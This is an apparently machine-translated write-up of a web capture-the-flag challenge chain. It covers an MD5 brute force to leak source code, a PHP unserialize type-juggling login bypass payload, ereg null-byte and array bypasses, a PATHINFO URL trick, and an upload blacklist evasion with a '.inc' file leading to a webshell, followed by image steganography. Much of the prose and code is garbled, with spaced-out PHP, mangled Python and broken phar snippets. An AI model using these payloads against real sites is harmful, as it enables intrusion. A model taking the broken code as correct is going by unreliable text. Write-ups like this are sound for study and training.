Three white hats-Roman series 2-writeup 0x00
Why does a good Web become misc? Friendship Boat !!!!
http://4e79618700b44607c.jie.sangebaimao.com
0x01 fetch source token
There is no Tips generation problem, the source region must be the first. Right-click to view the source region. there is no such thing. check the header.
Set-Cookie source=WXpOV2FXTXpVbmxMUnpGclRsTm5hMWd3WkVaV1JuTnVZekk1TVdOdFRteEtNVEJ3VEVSTmMwNXBhemxRVTBrMFRWZEZNRTFxWTJr
The answer is:
#!phpsubstr(md5($_GET['source']),3,6)=="81a427"
This familiar example has appeared in the homework of BCTF2016, although it is a little different. Lima provides an artifact
#!python#!/bin/env python#-*- encoding: utf-8 -*-import md5def mx(str): m1 = md5.new() m1.update(str) return m1.hexdigest()if __name__ == '__main__': m = '81a427' for x in range(1,100000000): a = mx(str(x))[3:9] if a == m: print x break
Run 47733
/index.php?source=47733
You can get the download address/WoShiYuanMa_SGBM.zip of the source hosts package.
0x02 login holes
#!php$password = unserialize($_POST['password']);if($_POST['username']='admin' && $password['username'] !== 'admin' && $password['password'] !== 'admin'){ if ($password['username'] == 'admin' && $password['password']=='admin') { $_SESSION['login'] = 1; echo "
Click jump to the Backstage
"; }
StartingUnserializeThe hacker hole in php. I found out that the vulnerability is a weak classification vulnerability in php features such as Taobao (=.
#!php(0 == "str")=>true(0 === "str")=>false
Create POST:
username=admin&password=a:2:{s:8:"username";i:0;s:8:"password";i:0;}&submit=1
Successfully approved ~
0x03 secondary certificate
#!phpif (isset($_POST['salt'])){ if (ereg("^[a-zA-Z0-9]+$", $_POST['salt']) === FALSE) { exit('ereg'); } elseif (strlen($_POST['salt']) < 11 && $_POST['salt'] > 999999999) { if (strpos($_POST['salt'], '*SGBM*') !== FALSE) { $_SESSION['admin'] = 1; echo "
Click jump to the Backstage
"; }
At first glance, it seems very cute.
The ereg processing data group will getNULL,
SameStrlenProcessing Data groups will also getNULL,
Array ()> intTrue,
The strpos processing data group will also getNULL.
Create POST:
salt[]=v&submit=1
Again perfect.
However, the official question is:
Bypass ereg function, % 00 found
Then, according to php features: 9e9> 999999999
Expected result: salt = 9e9% 00 * SGBM *
0x04 PATHINFO mode
#!php$URL = $_SERVER['REQUEST_URI'];$matches = array();preg_match('/^([a-z\/.]+)$/', $URL, $matches); if(strpos($URL, './') !== FALSE){ exit('./');}else if(strpos($URL, '\\') !== FALSE){ exit('\\');}else if(empty($matches) || $matches[1] != $URL){ exit('empty($matches) || $matches[1] != $URL');} else if(strpos($URL, '//') !== FALSE){ exit('//');} else if(substr($URL, -10) !== '/index.php'){ exit('substr($URL, -10) !== \'/index.php\'');} else if(strpos($URL, 'p.') !== FALSE){ exit('p.');} else if($URL == '/admin/index.php'){ exit('$URL == \'/admin/index.php\'');}else { if($URL !== '/admin/index.php'){ $_SESSION['power'] = 1; exit("
Click jump to the Backstage
"); }}
Starting from beginning to beginning, there was no solution, and then we got the Tips of Great God.
Still lack of experience ~
LN tips:
Answer Question (516421987) 1:12:49 multi-point frame experience should be able to guess
If BaiduPATHINFO mode
URL:/admin/index. php/admin/index. php
Successfully approved ~
0x05 fuzz Post-fuzz
#! Phpif ($ _ FILES ["file"] ['size']> 0 & $ _ FILES ["file"] ['size'] <102400) {$ typeAccepted = ["image/jpeg", "image/gif", "image/png"]; $ blackext = ["php", "php3", "php4 ", "php5", "pht", "phtml", "phps"]; // There is always a suitable $ filearr = pathinfo ($ _ FILES ["file"] ["name"]); if (! In_array ($ _ FILES ["file"] ['type'], $ typeAccepted) {exit ("type error ");} if (in_array ($ filearr ["extension"], $ blackext) {exit ("extension error") ;}$ filename = md5 (time (). rand (10, 99 )). ". ". $ filearr ["extension"]; $ destination_folder = '.. /uploads/'; $ destination_folder. = date ('Y', time ()). "/". date ('M', time ()). "/"; $ file_name_path = $ destination_folder. $ filename; if (! File_exists ($ destination_folder) mkdir ('. /'. $ destination_folder, 0777, true); if (move_uploaded_file ($ _ FILES ["file"] ['tmp _ name'], $ file_name_path) {exit ('upload success! ');} Else {exit ('upload false! ');}}
Black name list for the last day: $ blackext = ["php", "php3", "php4", "php5", "pht", "phtml", "phps"];
The specified file name $ filename = md5 (time (). rand (10, 99). ".". $ filearr ["extension"];
It depends on the suffix name after Fuzz.
At the beginning, I guess that the suffix name can be parsed by rows, but it is basically too old. Finally, I thought there was another inc suffix.
If it weren't for me that I had just rolled over the Phar package, I wouldn't have remembered the suffix name related to php.
#!php
buildFromDirectory(dirname(__FILE__) . '/virink');$phar->setStub($phar->createDefaultStub('virink.php', 'virink.php'));$phar->compressFiles(Phar::GZ);?>
GenerateVirink. pharFile, you will find
#!phpExtract_Phar::go(true);$mimes = array('phps' => 2,...,'xsd' => 'text/plain','php' => 1,'inc' => 1,'avi' => 'video/avi',...
If so, after the inc operation is completed, the row can be merged.
The problem is really awesome.
As for file name brute-force cracking, when Fuzz was started, a POC in the PHP script was written by the attacker.
#!php
virinkTEXT;$ext = 'inc';fuck($ext, $contents);?>
It's a little bit difficult to change, and it will be used in the future.
Getshell successful ~~
0x06 what a ghost? Misc
After getshell, it really hurts!
Imstudy (214329772) at 1:44:30, I said that the shell is broken. you don't believe me.
No,ImstudyIt's the problem Guy, boy. pick up the Langya stick in your hand and keep the security card intact ~~
When the kitchen knife is installed, it is found that/var/www/mesh is a video.Flag.jpg
ArtifactsStegsolve + WinHexTo extract the flag.txt package.
However, it is not the true flag, but the things in N-perspiration (x, y, z) format. Between 0 and, the guess is the RGB value.
This may have to be completed.
Calculates the row number, which is not the square size of the regular order.
Silently fold a POC and perfectly fold the photo.
#! Python #! /Bin/env python #-*-encoding: UTF-8-*-# _ author __: virinkfrom PIL import Imageimport matffe _ name _ = '_ main _': count = len(open('flag.txt ', 'r '). readlines () j = int (math. sqrt (count) I = j + 2 for k in range (0, I/4): sx = I-k sy = j + k if (sx * sy) = count: break c = Image. new ("RGB", (sx, sy) file = open('flag.txt ') for x in range (0, sx): for y in range (0, sy ): line = file. readline () # obtain a row of rgb = line. split (",") # separate rgb c. putpixel (x, y), (int (rgb [0]), int (rgb [1]), int (rgb [2]) c. show () c. save ("flag.png ")
It's okay. at this moment, my mind is falling!
FLAG : miao{fb49ac8a528901913ea2c664c6a8d6a1}